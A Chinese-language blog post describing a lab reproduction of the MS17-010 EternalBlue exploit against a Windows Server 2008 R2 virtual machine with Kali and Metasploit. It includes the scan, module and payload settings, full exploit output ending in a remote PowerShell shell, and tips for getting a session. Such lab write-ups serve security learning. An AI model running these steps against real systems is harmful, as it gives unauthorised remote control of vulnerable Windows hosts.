title: 内网渗透ms17-010复现
date: 2022-02-06T20:27:52Z
lastmod: 2022-02-09T09:52:22Z
tags: [MS17-010,metasploit,kali,445]
内网渗透ms17-010复现
一、复现环境
- 主机信息
OS Name:kali2020
metasploit framework:msf6
IP:192.168.31.53
- 靶机信息
OS Name: Microsoft Windows Server 2008 R2 Datacenter (en)
OS Version: 6.1.7600 N/A Build 7600
IP:192.168.31.156
Note: 靶机的选择对结果有很大的影响,本人在复现过程中使用过Windows7-pro-x64-cn,Windows7-home-x64-cn,Windows7-pro-sp1-x64-en,Windows7-pro-x64-en,Windows7-pro-x86-en,Windows server 2008 r2等,只有Microsoft Windows Server 2008 R2 Datacenter (en) 成功了,其他靶机报错:
“Exploit completed, but no session was created.”
二、复现过程
一、设置靶机
- VMware workstation新建虚拟机,网络设置为桥接模式,内存和CPU可根据电脑自身情况进行设置;
- 开机后网络设置专用网络和公共网络都可以,在专用网络情况下,不关闭防火墙也可以进行渗透,公共网络下必须关闭防火墙,建议关闭防火墙看,可以提高实验成功率;
- 确认靶机IP地址,在主机端使用ping命令测试是否可以连通;
C:\Windows\system32> ipconfig
- 445端口默认是开通的可以不做设置。
二、主机——kali2020
- 打开终端,使用NMAP扫描靶机IP,不出意外在扫描结果中可以看到445端口;
nmap 192.168.31.156
扫描结果:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-16 23:13 CST
Nmap scan report for 192.168.31.156
Host is up (0.022s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10243/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
- 开工搞事,启动metasploit框架
$ msfconsole
- 查找MS17-010相关模块
msf6 > search ms17-010
查询结果:
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
- 使用辅助模块先扫描一下,看靶机是否存在漏洞
命令:
msf6 > use auxiliary/scanner/smb/smb_ms17_010 //也可以用 use 3
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.31.156 //设置靶机IP
rhost => 192.168.31.156
msf6 auxiliary(scanner/smb/smb_ms17_010) > run //使用run执行
扫描结果:
[+] 192.168.31.156:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7600 x64 (64-bit)
[*] 192.168.31.156:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
//Host is likely VULNERABLE to MS17-010! 表明存在且可以利用
- 使用ms17_010_eternalblue模块开始搞事
msf6 auxiliary(scanner/smb/smb_ms17_010) > use 0 //use exploit/windows/smb/ms17_010_eternalblue 效果一样
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp //表示默认攻击载荷为 exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads //查看适用的全部攻击载荷
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
4 payload/windows/x64/exec normal No Windows x64 Execute Command
5 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
6 payload/windows/x64/messagebox normal No Windows MessageBox x64
7 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
8 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
9 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
10 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
11 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
12 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
13 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
14 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
15 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
16 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
17 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
18 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
19 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
20 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
21 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
22 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
23 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
24 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
25 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
26 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
27 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
28 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
29 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
30 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
31 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
32 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
33 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
34 payload/windows/x64/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
35 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
36 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
37 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
38 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
39 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
40 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
41 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
42 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
43 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
44 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
45 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
46 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
47 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
48 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
49 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
50 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
51 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
52 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
53 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
54 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
55 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
56 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
57 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
58 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
- 设置靶机IP和payload(攻击载荷),我使用的是“ 32 payload/windows/x64/powershell_bind_tcp”,攻击载荷的选择不唯一,我尝试了多个反弹shell的payload,只有32成功了,其他的报以下错误,建议切换不同的payload尝试
Exploit completed, but no session was created.
或
Command shell session 3 closed.
设置命令:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.31.156
rhost => 192.168.31.156
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 32
payload => windows/x64/powershell_bind_tcp
-
查看其他可设置选项,yes为必须设置;
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.31.156 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Win dows 7, Windows Embedded Standard 7 target machines. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Wi ndows Embedded Standard 7 target machines. Payload options (windows/x64/powershell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.31.53 yes The listen address (an interface may be specified) LOAD_MODULES no A list of powershell modules separated by a comma to download over the web LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target -
可以发现target没有设置,target可以使用默认设置“ 0 Automatic Target”,为了提高成功率也可以指定,LPORT为反弹shell的监听端口,可以自行设定,本次我设置为10243,;
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets //查看可用的全部类型target Exploit targets: Id Name -- ---- 0 Automatic Target 1 Windows 7 2 Windows Embedded Standard 7 3 Windows Server 2008 R2 4 Windows 8 5 Windows 8.1 6 Windows Server 2012 7 Windows 10 Pro 8 Windows 10 Enterprise Evaluation msf6 exploit(windows/smb/ms17_010_eternalblue) > set target 3 //设置target为Windows Server 2008 R2 target => 3 msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 10243 lport => 10243 -
神圣的时刻到来,成败在此一举
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
结果:
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] 192.168.31.156:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.31.156:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7600 x64 (64-bit)
[*] 192.168.31.156:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.31.156:445 - The target is vulnerable.
[*] 192.168.31.156:445 - Connecting to target for exploitation.
[+] 192.168.31.156:445 - Connection established for exploitation.
[+] 192.168.31.156:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.31.156:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.31.156:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.31.156:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente
[*] 192.168.31.156:445 - 0x00000020 72 20 37 36 30 30 r 7600
[+] 192.168.31.156:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.31.156:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.31.156:445 - Sending all but last fragment of exploit packet
[*] 192.168.31.156:445 - Starting non-paged pool grooming
[+] 192.168.31.156:445 - Sending SMBv2 buffers
[+] 192.168.31.156:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.31.156:445 - Sending final SMBv2 buffers.
[*] 192.168.31.156:445 - Sending last fragment of exploit packet!
[*] 192.168.31.156:445 - Receiving response from exploit packet
[+] 192.168.31.156:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.31.156:445 - Sending egg to corrupted connection.
[*] 192.168.31.156:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.31.156:10243
[*] Powershell session session 1 opened (192.168.31.53:45757 -> 192.168.31.156:10243 ) at 2022-01-17 00:13:44 +0800
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PS C:\Windows\system32>
PS C:\Windows\system32> ipconfig //查看成功渗透的靶机IP地址
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::b15b:c4d6:7df1:a737%11
IPv4 Address. . . . . . . . . . . : 192.168.31.156
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.31.1
Tunnel adapter isatap.{3C95E970-9F5F-4645-86BE-335848A6C11C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
PS C:\Windows\system32>
- 出现WIN和“ C:\Windows\system32> ”时表示成功了,接下来可以开启后渗透模式了!
结果有可能也会是这样的,经过一些FAIL才会WIN,不要慌
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] 192.168.31.156:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.31.156:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7600 x64 (64-bit)
[*] 192.168.31.156:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.31.156:445 - The target is vulnerable.
[*] 192.168.31.156:445 - Connecting to target for exploitation.
[+] 192.168.31.156:445 - Connection established for exploitation.
[+] 192.168.31.156:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.31.156:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.31.156:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.31.156:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente
[*] 192.168.31.156:445 - 0x00000020 72 20 37 36 30 30 r 7600
[+] 192.168.31.156:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.31.156:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.31.156:445 - Sending all but last fragment of exploit packet
[*] 192.168.31.156:445 - Starting non-paged pool grooming
[+] 192.168.31.156:445 - Sending SMBv2 buffers
[+] 192.168.31.156:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.31.156:445 - Sending final SMBv2 buffers.
[*] 192.168.31.156:445 - Sending last fragment of exploit packet!
[*] 192.168.31.156:445 - Receiving response from exploit packet
[+] 192.168.31.156:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.31.156:445 - Sending egg to corrupted connection.
[*] 192.168.31.156:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.31.156:10243
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.31.156:445 - Connecting to target for exploitation.
[+] 192.168.31.156:445 - Connection established for exploitation.
[+] 192.168.31.156:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.31.156:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.31.156:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.31.156:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente
[*] 192.168.31.156:445 - 0x00000020 72 20 37 36 30 30 r 7600
[+] 192.168.31.156:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.31.156:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.31.156:445 - Sending all but last fragment of exploit packet
[*] 192.168.31.156:445 - Starting non-paged pool grooming
[+] 192.168.31.156:445 - Sending SMBv2 buffers
[+] 192.168.31.156:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.31.156:445 - Sending final SMBv2 buffers.
[*] 192.168.31.156:445 - Sending last fragment of exploit packet!
[*] 192.168.31.156:445 - Receiving response from exploit packet
[+] 192.168.31.156:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.31.156:445 - Sending egg to corrupted connection.
[*] 192.168.31.156:445 - Triggering free of corrupted buffer.
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.31.156:445 - Connecting to target for exploitation.
[+] 192.168.31.156:445 - Connection established for exploitation.
[+] 192.168.31.156:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.31.156:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.31.156:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.31.156:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente
[*] 192.168.31.156:445 - 0x00000020 72 20 37 36 30 30 r 7600
[+] 192.168.31.156:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.31.156:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.31.156:445 - Sending all but last fragment of exploit packet
[*] 192.168.31.156:445 - Starting non-paged pool grooming
[+] 192.168.31.156:445 - Sending SMBv2 buffers
[+] 192.168.31.156:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.31.156:445 - Sending final SMBv2 buffers.
[*] 192.168.31.156:445 - Sending last fragment of exploit packet!
[*] 192.168.31.156:445 - Receiving response from exploit packet
[+] 192.168.31.156:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.31.156:445 - Sending egg to corrupted connection.
[*] 192.168.31.156:445 - Triggering free of corrupted buffer.
[*] Powershell session session 3 opened (192.168.31.53:34929 -> 192.168.31.156:10243 ) at 2022-01-16 19:56:59 +0800
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.31.156:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PS C:\Windows\system32>
三、复现后记
这次复现我花费整整两天,期间遇到的最多的错误是:
Exploit completed, but no session was created.
为了解决这个问题,查看了很多博文,有了一些自己的理解,下文我将结合自己的实际经验总结一下网上的方法:
- 一些payload模块对中文版Windows7支持欠佳,建议使用英文版Windows7或者尝试其他的payload;
- 下载的靶机系统较新,漏洞已修复无法利用,建议使用2009年发行的版本或者2017年之前的版本;
- 防火墙的干扰,包括物理机的防火墙、路由器的防火墙、靶机的防火墙和主机的防火墙,通过我实践发现,当创建虚拟机时将网络设置为桥接模式,只有靶机的防火墙会影响复现结果;
- metasploit框架集成的MS17-010不太稳定,建立session时容易Died,建议使用原始的fb.py,详细介绍参照
内网渗透之ms17-010,文中引用的参考资料“Metasploit 「永恒之蓝」两种模块的利弊”已链接失效,新的链接为Metasploit 「永恒之蓝」两种模块的利弊。
- 进行多次run或exploit;